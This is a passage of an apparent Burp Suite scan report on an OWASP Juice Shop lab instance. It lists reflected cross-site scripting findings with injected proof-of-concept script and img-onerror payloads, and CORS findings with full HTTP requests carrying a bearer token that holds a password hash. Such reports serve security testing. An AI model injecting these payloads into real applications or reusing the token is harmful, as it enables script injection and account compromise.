    Connection: close
    Content-Length: 934

    {
    "error": {
    "message": "Unexpected token z",
    "stack": "SyntaxError: Unexpected token z\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    )\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7,\"comment\":\"wewewe\",\"rating\":0zrydj<img src=a onerror=alert(1)>wla6t}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.12. http://192.168.61.143:3000/api/Feedbacks/ [request body]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload ivc1p<script>alert(1)</script>fzw7g was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"wewewe","rating":0}ivc1p<script>alert(1)</script>fzw7g

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:47 GMT
    Connection: close
    Content-Length: 931

    {
    "error": {
    "message": "Unexpected token i",
    "stack": "SyntaxError: Unexpected token i\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    \n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7,\"comment\":\"wewewe\",\"rating\":0}ivc1p<script>alert(1)</script>fzw7g",
    "status": 400,
    "statusCode": 400
    }
    }
    14.13. http://192.168.61.143:3000/api/Users/ [email JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Users/

    Issue detail

    The value of the email JSON parameter is copied into the HTML document as plain text between tags. The payload de508<script>alert(1)</script>jgyda was submitted in the email JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Users/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 108
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.comde508<script>alert(1)<\/script>jgyda","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 231
    ETag: W/"e7-TT6ZSYYFfJgV8aeROhh9ig"
    Date: Sun, 15 Jan 2017 21:10:28 GMT
    Connection: close

    {"status":"success","data":{"email":"mike_landeck@hotmail.comde508<script>alert(1)</script>jgyda","password":"a992b1b403cba28afb428e7f5a35c516","id":15,"updatedAt":"2017-01-15T21:10:28.000Z","createdAt":"2017-01-15T21:10:28.000Z"}}
    14.14. http://192.168.61.143:3000/api/Users/ [request body]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Users/

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload ta2gz<script>alert(1)</script>a7ofk was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Users/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 108
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}ta2gz<script>alert(1)</script>a7ofk

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:10:24 GMT
    Connection: close
    Content-Length: 1001

    {
    "error": {
    "message": "Unexpected token t",
    "stack": "SyntaxError: Unexpected token t\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"email\":\"mike_landeck@hotmail.com\",\"password\":\"juice-shop-password\",\"passwordRepeat\":\"juice-shop-password\"}ta2gz<script>alert(1)</script>a7ofk",
    "status": 400,
    "statusCode": 400
    }
    }
    14.15. http://192.168.61.143:3000/rest/user/login [request body]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/user/login

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload kc8b5<script>alert(1)</script>rzq3i was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /rest/user/login HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 69
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password"}kc8b5<script>alert(1)</script>rzq3i

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:13:36 GMT
    Connection: close
    Content-Length: 958

    {
    "error": {
    "message": "Unexpected token k",
    "stack": "SyntaxError: Unexpected token k\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    ack (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"email\":\"mike_landeck@hotmail.com\",\"password\":\"juice-shop-password\"}kc8b5<script>alert(1)</script>rzq3i",
    "status": 400,
    "statusCode": 400
    }
    }
    15. Cross-origin resource sharing
    Previous  Next

    There are 105 instances of this issue:

    Issue background

    An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

    If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially retrieve content from the application, and sometimes carry out actions within the security context of the logged in user.

    Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by an attacker to exploit the trust relationship and attack the application that allows access. CORS policies on pages containing sensitive information should be reviewed to determine whether it is appropriate for the application to trust both the intentions and security posture of any domains granted access.

    References



    15.1. http://192.168.61.143:3000/
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET / HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"2639-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.2. http://192.168.61.143:3000/api/BasketItems/
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":6,"BasketId":"4","quantity":1}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 156
    ETag: W/"9c-9cgpjd81EZEnsUVUx5UcuQ"
    Date: Sun, 15 Jan 2017 21:01:16 GMT
    Connection: close

    {"status":"success","data":{"ProductId":6,"BasketId":"4","quantity":1,"id":6,"updatedAt":"2017-01-15T21:01:15.000Z","createdAt":"2017-01-15T21:01:15.000Z"}}
    15.3. http://192.168.61.143:3000/api/BasketItems/7
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/7

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/BasketItems/7 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 154
    ETag: W/"9a-1C6ERKtHJRgLYI4755CP0A"
    Date: Sun, 15 Jan 2017 21:01:25 GMT
    Connection: close

    {"status":"success","data":{"id":7,"quantity":1,"createdAt":"2017-01-15T21:01:20.000Z","updatedAt":"2017-01-15T21:01:20.000Z","ProductId":8,"BasketId":4}}
    15.4. http://192.168.61.143:3000/api/BasketItems/8
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/8

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/BasketItems/8 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 154
    ETag: W/"9a-wTHEuTLtpNGewrPZXacyCQ"
    Date: Sun, 15 Jan 2017 21:02:40 GMT
    Connection: close

    {"status":"success","data":{"id":8,"quantity":1,"createdAt":"2017-01-15T21:02:25.000Z","updatedAt":"2017-01-15T21:02:25.000Z","ProductId":2,"BasketId":4}}
    15.5. http://192.168.61.143:3000/api/Complaints/
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"message":"wewewewewew"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 149
    ETag: W/"95-1QAsyuWrCA/wpIY6CpA3wg"
    Date: Sun, 15 Jan 2017 21:04:58 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"message":"wewewewewew","id":1,"updatedAt":"2017-01-15T21:04:58.000Z","createdAt":"2017-01-15T21:04:58.000Z"}}
    15.6. http://192.168.61.143:3000/api/Feedbacks/
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    If-None-Match: W/"516-ayfzPIPZ80YUQttXHSFV3w"

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    ETag: W/"516-ayfzPIPZ80YUQttXHSFV3w"
    Date: Sun, 15 Jan 2017 21:04:26 GMT
    Connection: close

    15.7. http://192.168.61.143:3000/api/Products/1
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/1

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/1?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
